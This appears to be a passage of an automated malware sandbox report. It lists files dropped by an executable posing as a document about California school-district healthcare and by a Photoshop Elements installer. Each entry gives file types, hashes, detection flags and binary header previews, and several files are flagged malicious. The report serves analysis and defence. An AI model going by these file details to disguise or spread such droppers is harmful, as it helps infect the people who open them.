                                                                                                      Preview:*, .9K..?..db...&+..Lc_Ob@Q.s.....$.9;|[...).)8..q"..8..Gm..|%.!O.4!#..6.O/(&z;S>)).Ge?.(.;..=9.J 15z.-1= 2>.y,..33.T!=$_ ,5.6...:r..#. +IKpw.-U>...)..$9..w&.....&...2*j.C.,y~Q{t.....<..... ;.K7)...q&..6+....{)..(c..'y-q#!..3.q..**.k>.|x<....G. %;.]...z..,Mi..}/.+5M( "!%.qu..:.9CV?&.'ba...1',%56qH....1/.*..Z9'.+2.0;.c1H0.#+_s%b.7.:p..zr@..a.55..'.<#-...<{R.(.!..).r)<.: ]..[Z.974.."86.F:T..k.--%.9.y)........Z6.j|9.0.O|.r+4-.1.-..}s.."z)....z.=9UL+q1'+. q7>.|...1q.F"f.8=e...).'39.C...'...%.y."..(. ..._.>m.4......x*%/.9..5&..|?.5 ..; >.s ;.[.as2.Q..o4?)$..5p..=...&$..!{."..m./'>'5..7!...!+..$.%.!.3A..).0)`x&.2.6-.?..c~.q..#_6.[#s1{vgfW<.*.8.>......%..'5..#3..>....d?.0.j.{.(...4.(.z#...+.7(&%.D ..9.<?x@~'$3.;Ls+:.7..5.)..7.<07/d..5<..*0.7.>Q1.!)>...**.\"7.A .+9". s.!/r22=......-...-'R@..1.#.9. .544..&j>.|`9..| C.\..'..2.8...I;8.&1u(c.4.$....p..X2.A.=.v/)..."..._..;L(07"...|6.+..09... #'2H).:'$..oH9..{d$..?.Z)?EX?C./0<.<!7.?-%NnM./..)..q6*_ (,..?m..%7."....3Q/..!...?*3 ?[..0.#..8.<(...-'..R
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (1197), with CRLF, LF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):34914
                                                                                                      Entropy (8bit):3.7620728084081025
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:styo2mh57cVQlhviG+aNSAOAA3t73GqHo/gk+lr7MICobonF/gsb:sgox/7cVdAOAGt7lHo4k+ZqoboF4sb
                                                                                                      MD5:F48B8C53C16D68AB7CE90068F56D3349
                                                                                                      SHA1:A8883D1C475ED2E6D6F80FC3D394DB011520C177
                                                                                                      SHA-256:CBE1FB3634DF4EA84DE515C6999DF2333EA23535B98BC54B0993D939C3DFCB74
                                                                                                      SHA-512:F34C376EE39E94FEE1D4BBE3A2574C7089C7BF50CF086E1C50412D2635EE51376E626418A428E1282EAE5EDFADC06195A3277C45932F382834E0C916854C2E93
                                                                                                      Malicious:false
                                                                                                      Preview:..1.1./.1.3./.2.4. .1.5.:.2.2.:.5.8.:.4.1.3. .|. .[.I.N.F.O.]. .|. .7.3.6.0. .|. .B.o.o.t.s.t.r.a.p.p.e.r. .|. .S.e.t.-.u.p. .|. .A.p.p.l.i.c.a.t.i.o.n.C.o.n.t.e.x.t. .|. . .|. . .|. .7.3.6.4. .|. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.o.r.k.f.l.o.w. .s.t.a.r.t... .V.e.r.s.i.o.n.:. .5...1.0...0...5.7.3. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....1.1./.1.3./.2.4. .1.5.:.2.2.:.5.8.:.4.1.3. .|. .[.I.N.F.O.]. .|. .7.3.6.0. .|. .B.o.o.t.s.t.r.a.p.p.e.r. .|. .O.O.B.E.U.t.i.l.s. .|. .C.o.m.m.a.n.d.L.i.n.e.P.a.r.s.e.r. .|. . .|. .O.O.B.E.U.t.i.l.s. .|. .7.3.6.4. .|. .P.a.r.s.i.n.g. .t.h.e. .c.o.m.m.a.n.d. .l.i.n.e. .p.r.o.v.i.d.e.d... .N.u.m.b.e.r. .o.f. .c.o.m.m.a.n.d. .l.i.n.e. .a.r.g.u.m.e.n.t.s. .i.s. .1.....1.1./.1.3./.2.4. .1.5.:.2.2.:.5.8.:.4.1.9. .|. .[.I.N.F.O.]. .|. .7.3.6.0. .|. .B.o.o.t.s.t.r.a.p.p.e.r. .|. . .|. .A.p.p.l.i.c.a.t.i.o.n.C.o.n.t.e.x.t. .|. . .|. . .|. .7.3.6.4. .|. .C.o.m.m.a.n.d. .l.i.n.e. .a.r.g.u.m.e.n.t.s. .a.s. .X.M.L.:. .<.C.o.m.m.a.n.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):176
                                                                                                      Entropy (8bit):4.866329860762867
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:GnJl1lysHFgtAeoaVjo+cAeoujPBDJlf2mLlxIPNrRlCkY:G3/uth6tjXleMl61rWkY
                                                                                                      MD5:89C34C89C9A7B412D588F23D9FDFBAE0
                                                                                                      SHA1:9165DF91E2EF643DB2BE37E607BCF5595845FB53
                                                                                                      SHA-256:AA44298C1F5960141C91A3189008FBB20237B936E19E4DDB766ED1F8FC3E93CE
                                                                                                      SHA-512:0E4655E70F8086128F1F7BE1CFCF3ADA2BC2A1DE9E7272C15EC56C866261DFE4F7C55B8A6F3DBE84AAB79034A6B5E0E7FFDB48913E0FE090E97EC5F83B5880BC
                                                                                                      Malicious:false
                                                                                                      Preview:{..."level" : "ERROR",..."maxFileUploadSize" : 1000,..."minFileUploadSize" : 500,..."uploadInterval" : 604800000,..."uploadOnError" : false,..."uploadOnSessionStart" : false..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                      Category:modified
                                                                                                      Size (bytes):4616696
                                                                                                      Entropy (8bit):7.889902633304767
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:zEN1arTV6P79lzRhuET6WtjIiM+BVHv4EW2hkQc8yUDM8ERvBGzhVarMgeqxFMxx:gNQlm9lzRj3x/wlhbxFQDR/4Q
                                                                                                      MD5:43843D75A5EEAD8EE3B71EE2ADCBA3FE
                                                                                                      SHA1:980C1446B25652312010C86C661D20BDAD647FDC
                                                                                                      SHA-256:BAFD3E50FCBC0CF95C718E9BCE72012991883908EC02B62806E0A6A451864483
                                                                                                      SHA-512:90547D04EEBC6B5D250BB7F27E1EDA926A56CEBEF1591879DBC36FB2112985BFDB29478CA1925A8727701CD52CE879FA6C4B74CCE42649A3ADF4558E94558C54
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: WinterRoost_Bearfoos Malware.zip, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-..-..-..9...>......>......0..9..........+......Y..C...%..9......9.../..9...*..-..d.......J....j.,..-...,......,..Rich-..................PE..L...2^.c...............!.PE......@R.p....PR.......@..........................p.......[G...@.................................hi..........h............GF. *..<j..............................T.......t.........................M.....................UPX0.....@R.............................UPX1.....PE..PR..NE.................@....rsrc................RE.............@..............................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 143804, version 0.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):143804
                                                                                                      Entropy (8bit):7.994906444446731
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:esmFO0Yj8E3HftwXBS/Zc2mR+R7yHRS44+Ia8pRZZ3TAhG:e9LYQE31wxhC7CRSR3a8pPZDAhG
                                                                                                      MD5:D070306A9062178AFDFA98FCC06D2525
                                                                                                      SHA1:BA299B83EB0A3499820FDDCF305AF0DDBDA3E5D0
                                                                                                      SHA-256:8F5CCDFD3DA9185D4AD262EC386EBB64B3EB6C0521EC5BD1662CEC04E1E0F895
                                                                                                      SHA-512:7C69E576B01642ECD7DD5FE9531F90608FA9ADE9D98A364BCC81CCD0DA4DAEF55FD0BABC6CB35BFF2963274D09EF0CD2F9BCE8839040776577B4E6A86EB5ADD5
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF......1................................BASE.......F...Fe(].DYNA............m...GPOS......`s....-GSUB..g(....../FL.Y.OS/2...|...W...`[.Hcmap..*............gcvt .......&...&...Ofpgm...........s.Y.7gasp................glyf...@..in..)...+.head.......6...6....hhea.......!...$....hmtx............ ).loca.......V........maxp....... ... .|..name...H........|'5post......#...R...!.prep...8...B...B0."...............ideoromn..DFLT..cyrl..grek..latn...................`.........-.0.................7...}............x.].=N.0...8,..H..-+.+..R8.P.@(<.?.D..Hih\p..3]..`.....3......k..m.......L.. ...I ..U.I..8sl..w..dQ?..:.x.....o[...`..V.t...).*Q.....s.....L./..L`.//..F..i.C..+*=*ctEc.h.. ....G..d...57..J..T...AYCC.*.;..`<1....b.OLDYTI..<..Q.a.5..=.....'5...$.k.................7..,.._.<..........c[......c.c.d...>..............x.SIn.0.}......}dJ..A+;1.....@..E...Wb.x.nz.... .....z.>QLk.T.....OQ6.w....u.Qc..9.q.opmq..0..E...6.x.....-...O...[.2.i....'...8_-nb.|..E./....h[|...bq....
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 144168, version 0.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):144168
                                                                                                      Entropy (8bit):7.994901288784953
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:0JsrKvbKys3MjOtF2manL9S85AsPO5TKljTSTXTqDqd7GrinYhG:0JsVcbnL9/AsPCT6SrTBauYhG
                                                                                                      MD5:E204643042591AEEC2043C5EAE255099
                                                                                                      SHA1:BA5F2F94740400F540BEFC89F1C4D022A26FAA84
                                                                                                      SHA-256:7F58F56A7A353F8FC78EC2757394A7C7F28165E6BBF2A37D6A6E48E845874F3E
                                                                                                      SHA-512:7196C5B8E88100A08EB296BE7570DF4D045268AD6BAB1C45EBAA9063AA9B46B8896886E24A9F861E322B167DD95E18D5A18ABB76F1BB01C8BC85C36BEAD855EF
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF......3(.......|........................BASE.......F...Fe$].DYNA............m...GPOS......`......>x.GSUB..gX....../FL.Y.OS/2...x...Y...`\7..cmap..,............gcvt .......&...&...nfpgm...........s.Y.7gasp................glyf...p..j...7.uZ.yhead.......6...6...)hhea.......!...$....hmtx................loca.......z........maxp....... ... .|.#name...H............post......#...R...!.prep...4...B...B.-................ideoromn..DFLT..cyrl..grek..latn...................\.........L.S.................7...}............x.].=N.0...8,..H..-+.+..R8.P.@(<.?.D..Hih\p..3]..`.....3......k..m.......L.. ...I ..U.I..8sl..w..dQ?..:.x.....o[...`..V.t...).*Q.....s.....L./..L`.//..F..i.C..+*=*ctEc.h.. ....G..d...57..J..T...AYCC.*.;..`<1....b.OLDYTI..<..Q.a.5..=.....'5...$.k.................7.l.^*_.<..........c[......c.f.]...h..............x.R.n.@.=N."..!..G.m'c.V.^%m..j.H.;.$.b{"{.*+$.......,...|..N.SQ...j.3..s.<..5.!@.p48.+......=..;\y.&.x.=.{|.7..q.!...._rV.......-t.....C...65?<.....x.Zz.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 143016, version 0.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):143016
                                                                                                      Entropy (8bit):7.994779560734768
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:2De4YJzog90DMe34IKyca1puoUuDOa5xtTt9mkmpsxhG:2D/skj4IK+1lUU31t9cOxhG
                                                                                                      MD5:DFCE51814CF6D2F42375F948602CD99D
                                                                                                      SHA1:766E162FF305343010B67FBAA28B36AF277C5B34
                                                                                                      SHA-256:7A8A945586A1D21D2922CB4AED9E28D872129F6C396AC69F47EF3E32EA972BA0
                                                                                                      SHA-512:2C9489C18719AD29928E86A9E631E080B024C882A77A582F40F4F86F625DE9B08AD3C09710D5EE32B5CAE5284FD960F412F05290BDB3B4709F097B269B99CE21
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF........................................BASE.......F...Fe!].DYNA............m...GPOS......`c....5..GSUB..g......./FL.Y.OS/2...x...Y...`]_..cmap..'............gcvt .......&...&....fpgm...........s.Y.7gasp................glyf...0..fQ...($g..head.......6...6...hhea.......!...$....hmtx...... .....N.Rloca......`.....,..maxp....... ... .|.yname...H..........{Qpost......#...R...!.prep...4...B...B..................ideoromn..DFLT..cyrl..grek..latn...................Y.........m.y.................7...}............x.].=N.0...8,..H..-+.+..R8.P.@(<.?.D..Hih\p..3]..`.....3......k..m.......L.. ...I ..U.I..8sl..w..dQ?..:.x.....o[...`..V.t...).*Q.....s.....L./..L`.//..F..i.C..+*=*ctEc.h.. ....G..d...57..J..T...AYCC.*.;..`<1....b.OLDYTI..<..Q.a.5..=.....'5...$.k.................7....._.<..........c[......c.V.L..................x...n.@.....!.V,.@.c.V..!i..U.D..'.4QlO.......@b...$<.'.)...W.....;?6.W....u.../8j.....w ..s....].....^..}D........=.x.............=.=..c.....t..1..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 106380, version 0.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106380
                                                                                                      Entropy (8bit):7.993290139237183
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:JyMTihCz2OrS11KrlnLQmqz8sZ58o17gosLpZ7wC/jRLS2MsXAtYpIdl3vfyupNJ:JbTyry+1yl8mq4LZG2LAtYp8zpNZ/
                                                                                                      MD5:FA794EC12D353C26805FF53821331FC2
                                                                                                      SHA1:CBC6658BADEDA2AD9B0D2E03A0A35FF7FBBA542A
                                                                                                      SHA-256:CFDBD8A2AA463C11E483DC10C480ACD274E9786632F5571A3970E8A20A2D8237
                                                                                                      SHA-512:1161AFDBF6FC9B74421031FE6E139587F291FFAEC03CAE4AA76C1A86E10A69C7B1602ECBFBF60287CE8ED926377AD159992CDE605BA98E75B212E971B7E14F18
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF..............X.........................BASE.......F...Fe$].DYNA............q.&`GPOS......=.....$.i.GSUB..Dx.........W..OS/2...x...Z...`\8..cmap...p..........X@cvt .......&...&...nfpgm...........s.Y.7gasp................glyf..R<...G..V d.P.head.......6...6.@..hhea.......#...$. ..hmtx..n........4C.].loca..x....|...8.G.0maxp....... ... ....name...H........52..post..........-...prep...4...B...B.-................ideoromn..DFLT..cyrl..grek..latn...................\.........L.S.................7...}............x.].=N.0...8,..H..-+.+..R8.P.@(<.?.D..Hih\p..3]..`.....3......k..m.......L.. ...I ..U.I..8sl..w..dQ?..:.x.....o[...`..V.t...).*Q.....s.....L./..L`.//..F..i.C..+*=*ctEc.h.. ....G..d...57..J..T...AYCC.*.;..`<1....b.OLDYTI..<..Q.a.5..=.....'5...$.k.................7.Wq<._.<..........c[......c.K.%...1..............x.R.n.@...i%.T.8p@..]..Z.1...DN...#..l.+.7..H.!.W.H.x...G`..V..O..~3......?..}...8.s.Z.......-.{.f...z....^...........<..:..q./.......=.R...]|.~z..7....
                                                                                                      Process:C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):3157504
                                                                                                      Entropy (8bit):6.366572743788587
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:NWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbO333l5:XtLutqgwh4NYxtJpkxhGl333L
                                                                                                      MD5:F386E39F745DF29C2619F21BCA6DAEB7
                                                                                                      SHA1:C9138A609BD645E9900D6DBE81F21F0F109784BE
                                                                                                      SHA-256:53E81F92037DE45F985ADA2D311B1BB075799ED674BE340A99829B54A8806193
                                                                                                      SHA-512:6DD83F6F5519BA13B7CFD84CA8D4DD5D21E37E92D0053C264A5B4840A7416545B76ACCED87EE891D4D83EBE600E7378F2841095053B88D1EDE68763E41788A37
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: WinterRoost_Bearfoos Malware.zip, Detection: malicious, Browse
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4616696
                                                                                                      Entropy (8bit):7.889902633304767
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:zEN1arTV6P79lzRhuET6WtjIiM+BVHv4EW2hkQc8yUDM8ERvBGzhVarMgeqxFMxx:gNQlm9lzRj3x/wlhbxFQDR/4Q
                                                                                                      MD5:43843D75A5EEAD8EE3B71EE2ADCBA3FE
                                                                                                      SHA1:980C1446B25652312010C86C661D20BDAD647FDC
                                                                                                      SHA-256:BAFD3E50FCBC0CF95C718E9BCE72012991883908EC02B62806E0A6A451864483
                                                                                                      SHA-512:90547D04EEBC6B5D250BB7F27E1EDA926A56CEBEF1591879DBC36FB2112985BFDB29478CA1925A8727701CD52CE879FA6C4B74CCE42649A3ADF4558E94558C54
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: WinterRoost_Bearfoos Malware.zip, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-..-..-..9...>......>......0..9..........+......Y..C...%..9......9.../..9...*..-..d.......J....j.,..-...,......,..Rich-..................PE..L...2^.c...............!.PE......@R.p....PR.......@..........................p.......[G...@.................................hi..........h............GF. *..<j..............................T.......t.........................M.....................UPX0.....@R.............................UPX1.....PE..PR..NE.................@....rsrc................RE.............@..............................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6144
                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):943593
                                                                                                      Entropy (8bit):6.683286371944535
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:jv3J8Stk9f6g3Sw8N+JIIxa6tHq6JtYyYVr7VglM+kT:jG04Pi3NaIjOKuuyYVr7SlbA
                                                                                                      MD5:3F893C500BFCFF220640DB529EB18F37
                                                                                                      SHA1:4D063497249508D0C99D32FE6BFB8223D0A138F0
                                                                                                      SHA-256:26CC7078A0B8FD480708C4CF1B738524FCF24F729B181DDC4DB2F5D38AC1A681
                                                                                                      SHA-512:AEC39D4AD64D1E5D4445EAA6C298C770AFF9F7DC2B6D732C1A744EFB8FF31F1A4C63334A140120D2010A97CAB1020E6850F7E1A9E3509B47685FD9C8E0F86904
                                                                                                      Malicious:false
                                                                                                      Preview:*, .9K..?..db...&+..Lc_Ob@Q.s.....$.9;|[...).)8..q"..8..Gm..|%.!O.4!#..6.O/(&z;S>)).Ge?.(.;..=9.J 15z.-1= 2>.y,..33.T!=$_ ,5.6...:r..#. +IKpw.-U>...)..$9..w&.....&...2*j.C.,y~Q{t.....<..... ;.K7)...q&..6+....{)..(c..'y-q#!..3.q..**.k>.|x<....G. %;.]...z..,Mi..}/.+5M( "!%.qu..:.9CV?&.'ba...1',%56qH....1/.*..Z9'.+2.0;.c1H0.#+_s%b.7.:p..zr@..a.55..'.<#-...<{R.(.!..).r)<.: ]..[Z.974.."86.F:T..k.--%.9.y)........Z6.j|9.0.O|.r+4-.1.-..}s.."z)....z.=9UL+q1'+. q7>.|...1q.F"f.8=e...).'39.C...'...%.y."..(. ..._.>m.4......x*%/.9..5&..|?.5 ..; >.s ;.[.as2.Q..o4?)$..5p..=...&$..!{."..m./'>'5..7!...!+..$.%.!.3A..).0)`x&.2.6-.?..c~.q..#_6.[#s1{vgfW<.*.8.>......%..'5..#3..>....d?.0.j.{.(...4.(.z#...+.7(&%.D ..9.<?x@~'$3.;Ls+:.7..5.)..7.<07/d..5<..*0.7.>Q1.!)>...**.\"7.A .+9". s.!/r22=......-...-'R@..1.#.9. .544..&j>.|`9..| C.\..'..2.8...I;8.&1u(c.4.$....p..X2.A.=.v/)..."..._..;L(07"...|6.+..09... #'2H).:'$..oH9..{d$..?.Z)?EX?C./0<.<!7.?-%NnM./..)..q6*_ (,..?m..%7."....3Q/..!...?*3 ?[..0.#..8.<(...-'..R
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):537
                                                                                                      Entropy (8bit):5.147241145555799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:TMHdtTyKAywopOGmNTWe7SJJnPd+p3mv9NhuaAi4HY2:2dtTgopj2GJJnPd+p3mvXB2
                                                                                                      MD5:9BF27F7E06B54FC3711224323D4FA105
                                                                                                      SHA1:F870330D52A34C4E3F475CE117E779A510FF3501
                                                                                                      SHA-256:195A6EEB37951C00E8A3CD3366F0BE21AB9AA4124379D5B8EC468A9368F477FD
                                                                                                      SHA-512:4727BE8B5C550F3B578360512FC243CA9599112B44088066F6204B09D30238BC51100E1B45DDD549DAE0F5990A924216CC0330AAB9B036B8AB445D44306BDEC0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Config>...<UIConfig>....<HideVersion>true</HideVersion>....<SkipLaunch>false</SkipLaunch>....<HidePIIScreen>false</HidePIIScreen>....<ShowInstallOptions>true</ShowInstallOptions>....<CarouselType>GenericCarousel</CarouselType>....<SkipAccLaunch>true</SkipAccLaunch>....<LaunchProductDetail>.....<ProductInfo>......<SAPCode>HPSE</SAPCode>......<BaseVersion>24.0</BaseVersion> ......<Platform>win64</Platform>.....</ProductInfo>....</LaunchProductDetail>...</UIConfig>..</Config>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72894
                                                                                                      Entropy (8bit):3.39022096760406
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:tPlV2A9AdAu/Cav44aej0H4FlhoVhJBgdjdI:nibC4XhoVhJBgdjdI
                                                                                                      MD5:971F2873438B01FDE7253D4C7AA9847D
                                                                                                      SHA1:0770D352F1D64C68EF7F044421572E52C6A11613
                                                                                                      SHA-256:3059720FFB1B37E79F60F252F4CA4B438C49ABA0BF5B7CC8EAEF28023635E480
                                                                                                      SHA-512:AFDC5C2150A9BBF653D55C4D1BECD484D2FB5AC6618F1B2214E27086D52CFDE72DD30DE7E0ABDA3BFD17383162CAE3B7993F9957B3D38CB52C680AAE8581BCE2
                                                                                                      Malicious:false
                                                                                                      Preview:..{... . . . .".W.i.n.d.o.w.T.i.t.l.e.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".{.0.}. .I.n.s.t.a.l.l.e.r."... . . . .}.,... . . . .".V.e.r.s.i.o.n.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".V.e.r.s.i.o.n."... . . . .}.,... . . . .".W.i.n.d.o.w.T.i.t.l.e.U.n.i.n.s.t.a.l.l.e.r.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".{.0.}. .U.n.i.n.s.t.a.l.l.e.r."... . . . .}.,.....".W.i.n.d.o.w.T.i.t.l.e.U.p.d.a.t.e.r.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".{.0.}. .U.p.d.a.t.e.r."... . . . .}.,... . . . .".W.i.n.d.o.w.T.i.t.l.e.P.a.c.k.a.g.e.D.o.w.n.l.o.a.d.e.r.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".A.d.o.b.e. .P.a.c.k.a.g.e. .D.o.w.n.l.o.a.d.e.r."... . . . .}.,... . . . .".T.y.p.e.3.W.i.n.d.o.w.T.i.t.l.e.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".E.n.t.e.r.p.r.i.s.e. .I.D. .S.i.g.n. .i.n."... . . . .}.,... . . . .".M.e.n.u.A.d.o.b.e. .I.n.s.t.a.l.l.e.r.".:. .{... . . . . . . . .".m.e.s.s.a.g.e.".:. .".A.d.o.b.e. .I.n.s.t.a.l.l.e.r."... . . . .}.,...
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines (1068), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1068
                                                                                                      Entropy (8bit):5.074929409079747
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dttE3cRWpWCBywhWvaA0RLWrLzLQLkL94L+qlLoLAlL31E:cakCtahqvU
                                                                                                      MD5:647440680B370D4F3EB00ED7D14F1EFF
                                                                                                      SHA1:8CD6C56BA650002DBA1AFA99881E7C61A51DF19A
                                                                                                      SHA-256:4A0794B26A5EE3BED281588B4035FDAB12A55578107C65638DEB678AB8776EBA
                                                                                                      SHA-512:1A08AC6E8B1DA74604F38D37FA59ADA9E13D787CF80E5406A30BFFD7AC115AE5A466A1242C238FF7F5C8E597008D60C69536F1AB5E68DBC68307A31ECCF5D753
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><DriverInfo><ProductInfo><Name>Adobe Photoshop Elements 2024</Name><SAPCode>PSE</SAPCode><CodexVersion>24.0</CodexVersion><BaseVersion>24.0</BaseVersion><Platform>win64</Platform><Dependencies><Dependency><SAPCode>EORG</SAPCode><BaseVersion>24.0</BaseVersion></Dependency><Dependency><SAPCode>HPSE</SAPCode><BaseVersion>24.0</BaseVersion></Dependency><FFCChannel>nocc_sti2</FFCChannel></Dependencies><IsNonCCProduct>true</IsNonCCProduct><IsNglEnabled>true</IsNglEnabled><SupportedLanguages><Language locale="cs_CZ"></Language><Language locale="de_DE"></Language><Language locale="en_US"></Language><Language locale="es_ES"></Language><Language locale="fr_FR"></Language><Language locale="it_IT"></Language><Language locale="ja_JP"></Language><Language locale="nl_NL"></Language><Language locale="pl_PL"></Language><Language locale="sv_SE"></Language></SupportedLanguages><MinimumSupportedRuntimeVersion>5.6.0.0</MinimumSupportedRuntimeVersion><H
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1605030
                                                                                                      Entropy (8bit):7.998585570940298
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:eYpOnuDPhMESpTfXcGiJjnTd2GiIHhXlwQV2GsAoth6oqx1KKqZ5vvPDhMCLOrzB:CuDPaZX7wnTYAB12GsTtwoqx85lZOroQ
                                                                                                      MD5:0BD7470ADF34ECED0D063F0D8766BFB1
